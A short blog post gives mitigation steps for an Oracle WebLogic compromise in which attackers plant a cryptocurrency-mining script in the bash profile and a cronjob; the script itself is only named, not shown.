HACKED: Oracle WebLogic Bitcoin/Blockchain Mining HACK Event

Apply below procedure to mitigate the HACKING event!

M. Fevzi Korkutata
2 min readAug 20, 2024
Oracle WebLogic Bitcoin/Blockchain Mining HACK Event

Procedure to Mitigate Oracle WebLogic HACKING Event Mitigate Oracle WebLogic Server

If you have below script in your bash profile and a suspicious cronjob in your server. This means you have been HACKED. Your Oracle WebLogic server has been hacked. That’s why your server’s CPU usage is high and bitcoin mining is consuming your server’s CPUs.

Apply below procedure to mitigate the HACKING event!

  1. Close and disable outbound internet access from your server.
  2. Close and disable inbound internet access to your WebLogic console and managed server ports.
  3. Disable WebLogic t3 protocol access.
  4. Apply the latest Oracle WebLogic patches.
  5. Apply the latest Java JDK update to your environment.
  6. Disable WebLogic console access from internet permanently.
  7. Put Reverse proxy webserver infront of Oracle WebLogic http ports.

Mining Script for WebLogic Hacking

Oracle WebLogic Mining HACK Script

✅ LinkedIn Follow

Follow to learn…

Follow on LinkedIn: https://linkedin.com/in/mfevzikorkutata

Remember to follow🔔, Like👍 and add your technical comments🗨… 🤗

--

--

M. Fevzi Korkutata
M. Fevzi Korkutata

Written by M. Fevzi Korkutata

CTO | Man in the middleware.. Solves very large scale software Dev&Ops problems with a few chess moves!